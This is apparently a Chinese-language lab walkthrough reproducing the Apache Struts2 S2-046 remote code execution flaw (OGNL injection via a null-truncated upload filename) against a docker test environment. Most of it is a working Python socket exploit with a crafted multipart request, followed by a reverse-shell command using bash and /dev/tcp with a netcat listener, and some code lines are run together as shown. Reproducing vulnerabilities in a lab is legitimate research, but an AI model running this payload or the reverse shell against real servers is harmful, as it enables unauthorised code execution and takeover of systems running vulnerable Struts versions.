前言
使用Jakarta插件处理文件上传操作时可能导致远程代码执行漏洞。
影响版本
Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
漏洞环境
执行如下命令启动struts2 2.3.30:
docker-compose up -d
访问http://your-ip:8080即可看到上传页面。
漏洞复现
与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断。
由于需要发送畸形数据包,我们简单使用原生socket编写payload:
import socket
q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b"Content-Type: text/plainfoo------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n')p = b'''POST / HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.8,es;q=0.6Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2Content-Length: %d'''.replace(b'\n', b'\r\n') % (len(q), )
with socket.create_connection(('your-ip', '8080'), timeout=5) as conn:
conn.send(p + q)
print(conn.recv(10240).decode())修改your-IP即可直接运行
python3 1.py
233*233已成功执行
参考:https://github.com/mazen160/struts-pwn
我们试试反弹shell
python3 1.py --url 'http://192.168.111.129:8080' -c 'bash -i >& /dev/tcp/192.168.111.129/6767 0>&1’
监听
nc -lvvp 6767
